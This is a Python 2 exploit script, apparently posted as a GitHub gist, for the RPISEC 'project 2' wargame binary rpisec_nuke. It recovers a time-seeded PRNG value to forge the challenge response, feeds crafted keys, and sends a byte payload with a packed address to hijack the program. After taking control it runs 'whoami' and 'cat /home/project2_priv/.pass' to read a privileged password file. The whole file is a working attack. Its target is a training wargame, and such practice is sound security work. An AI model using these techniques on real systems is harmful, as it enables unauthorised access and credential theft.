#!/usr/bin/env python | |
# project 1 helper script | |
import subprocess | |
import binascii | |
import struct | |
import sys | |
import ctypes | |
import time | |
from operator import xor | |
def signThis(i): | |
return ctypes.c_int32(i).value | |
# function to read the file descriptor until it finds a string | |
def readuntil(fd, needle): | |
data = "" | |
while needle not in data: | |
data += fd.read(1) | |
return data | |
def dumpOutput(fd): | |
print "+---------------+" | |
print "|****DUMPING****|" | |
print "+---------------+" | |
while True: | |
sys.stdout.write(fd.read(1)) | |
def tohex(val, nbits): | |
return hex((val + (1 << nbits)) % (1 << nbits)) | |
def dots(x): | |
splitSize = 2 | |
ret = [x[i:i+splitSize] for i in range(0, len(x), splitSize)] | |
return '.'.join(ret) | |
def xorChallenges(first_challenge, challenge): | |
first_challenge = [''.join(x.split('.')) for x in first_challenge] | |
challenge = [''.join(x.split('.')) for x in challenge] | |
splitSize = 2 | |
for j in xrange(len(first_challenge)): | |
x = first_challenge[j] | |
first_challenge[j] = [x[i:i+splitSize] for i in range(0, len(x), splitSize)] | |
for j in xrange(len(challenge)): | |
x = challenge[j] | |
challenge[j] = [x[i:i+splitSize] for i in range(0, len(x), splitSize)] | |
# Xor all the values together | |
xored = [] | |
for j in xrange(len(challenge)): | |
x = challenge[j] | |
y = first_challenge[j] | |
xored.append([]) | |
for k in xrange(len(x)): | |
a = ctypes.c_ubyte(int(x[k],16)).value | |
b = ctypes.c_ubyte(int(y[k],16)).value | |
xoval = hex(ctypes.c_ubyte(a ^ b).value) | |
xored[j].append(xoval) | |
for i in xrange(len(xored)): | |
line = xored[i] | |
xored[i] = "".join(["00"[len(x[2:]):]+x[2:] for x in line]) | |
return xored | |
def findChallenge(cline, ctime, offset): | |
# Get our random numbers ( 4 needed ) | |
crand.seed_rand(ctime) | |
rNums = [] | |
for _ in xrange(offset): | |
crand.get_random() | |
for _ in xrange(4): | |
rNums.append(crand.get_random()) | |
# Get the integer values for xoring | |
cline = ''.join(cline.split('.')) | |
splitSize = 8 | |
words = [cline[i:i+splitSize] for i in range(0, len(cline), splitSize)] | |
# This flips for little endian | |
for wi in xrange(len(words)): | |
w = words[wi] | |
splitSize = 2 | |
words[wi] = ''.join([w[i:i+splitSize] for i in range(0, len(w), splitSize)[::-1]]) | |
intVals = [ signThis(int('0x'+x,16)) for x in words ] | |
# Xor all the values together | |
xored = [] | |
for i in range(4): | |
a = rNums[i] | |
b = intVals[i] | |
xored.append(ctypes.c_uint32(a ^ b).value) | |
# Turn the int values back to hex | |
xoredHex = [ tohex(x,32)[2:-1] for x in xored ] | |
# Pad those values with 0's for the memory | |
xoredHex = [ "00000000"[len(x):]+x for x in xoredHex ] | |
# Flip them for memory order | |
for xi in xrange(len(xoredHex)): | |
x = xoredHex[xi] | |
splitSize = 2 | |
xoredHex[xi] = ''.join([x[i:i+splitSize] for i in range(0, len(x), splitSize)[::-1]]) | |
cAns = ''.join(xoredHex) | |
#splitSize = 2 | |
#cAns = [cAns[i:i+splitSize] for i in range(0, len(cAns), splitSize)] | |
#cAns = '.'.join(cAns) | |
return cAns | |
# Import our rand seeder | |
crand = ctypes.cdll.LoadLibrary("./randlib.so") | |
crand.seed_rand(int(time.time())) | |
# run the project | |
#p = subprocess.Popen('nc warzone.rpis.ec 31337', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True) | |
#p = subprocess.Popen('/tmp/bleached/project2/rpisec_nuke', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True) | |
p = subprocess.Popen('strace /tmp/bleached/project2/rpisec_nuke', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True) | |
key2 = '00112233445566778899aabbccddeeff' | |
key3 = ['00112233000000000000000000000000', '00000000445566770000000000000000', '00000000000000008899aabb00000000', '000000000000000000000000ccddeeff'] | |
#key2 = '4e96e75bd2912e31f3234f6828a4a897' | |
#key3 = ['90357303000000000000000000000000', '00000000412ef8220000000000000000', '0000000000000000cd10e79800000000', '000000000000000000000000760491a6'] | |
############# | |
# Third Key # | |
############# | |
p.stdin.write("3\n") | |
session = int(readuntil(p.stdout, "]=---------=|").split('\n')[-1].split(' ')[4][7:-7]) | |
p.stdin.write(str(session)+"\n") | |
print readuntil(p.stdout, "CHALLENGE (64 Bytes):") | |
#GET CHALLENGE, GET TIME NOW | |
challenge = readuntil(p.stdout, "-------------------------------------------------------\n") | |
challenge = challenge.split("\n")[1:5] | |
challenge[0] = challenge[0][7:] | |
challenge = [l[30:] for l in challenge] | |
print readuntil(p.stdout, "TIME NOW:") | |
challenge_time = readuntil(p.stdout, "\n") | |
challenge_time = int(challenge_time.strip()[7:]) | |
# Get the seed | |
CLine = challenge[0] | |
seed = 0 | |
for x in range(50): | |
seed = ctypes.c_uint32(challenge_time + session - x).value | |
if findChallenge(CLine, seed,0) == "00000000000000000000000000000000": | |
break | |
offset = 4 | |
for x in xrange(4): | |
challenge[x%4] = findChallenge(challenge[x%4], seed, offset*4) | |
offset += 1 | |
# Finally xor with the first_challenge to get the leak | |
challenge = xorChallenges(key3, challenge) | |
challenge_input = ''.join(challenge) | |
p.stdin.write(challenge_input+"\n") | |
############## | |
# Second Key # | |
############## | |
p.stdin.write("2\n") | |
print readuntil(p.stdout, "ENTER AES-128 CRYPTO KEY:") | |
p.stdin.write(key2 + "\n") | |
print readuntil(p.stdout, "ENTER LENGTH OF DATA (16 OR 32):") | |
p.stdin.write("\n") | |
print readuntil(p.stdout, "DATA LENGTH SET TO") | |
p.stdin.write("\n") | |
print readuntil(p.stdout, "AUTHENTICATING") | |
p.stdin.write("\n") | |
############# | |
# First Key # | |
############# | |
p.stdin.write("1\n") | |
p.stdin.write("\x00\n") | |
p.stdin.write("\n") | |
print readuntil(p.stdout, "+-----------------------------------------------------+") | |
################### | |
# ON TO BOOM BOOM # | |
################### | |
p.stdin.write("4\n") | |
print readuntil(p.stdout, "READY") | |
# My Program | |
#program = "ADOOM\x00\x00\x00" # 8 bytes | |
program = "I"*132 + "S"+'A'+"IS"+'A'+"IS"+'A'+"IS"+'A'+"ISRISAISLIS ISDISOISOISMIADOOM\x00\x00\x00" | |
#program = "S"+'G'+"IS"+'E'+"IS"+'N'+"IS"+'E'+"ISRISAISLIS ISDISOISOISMIADOOM\x00\x00\x00" | |
#program = "I"*62 + "OIOIOIOI" | |
#program = "I"*132 + "S"+s[3]+"IS"+s[2]+"IS"+s[1]+"IS"+s[0]+"ISRISAISLIS ISDISOISOISMIADOOM\x00\x00\x00" | |
p.stdin.write(program*2) | |
p.stdin.write("\xa9\x59\xdc\xdc"+"\x4a\x00\x00\x00\x40\x45\x4e\x44\n") | |
p.stdin.write("\n") | |
p.stdin.write("CONFIRM\n") | |
dumpOutput(p.stdout) | |
print readuntil(p.stdout, "CYBER NUKE IS LAUNCHING") | |
print readuntil(p.stdout, "ATTEMPTING TO CONNECT TO UPLINK") | |
print readuntil(p.stdout, "EXECUTING...") | |
print readuntil(p.stdout, "MISSION SUCCESS") | |
# Got Root? | |
time.sleep(0.5) | |
p.stdin.write("whoami\n") | |
time.sleep(0.5) | |
p.stdin.write("cat /home/project2_priv/.pass\n") | |
dumpOutput(p.stdout) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment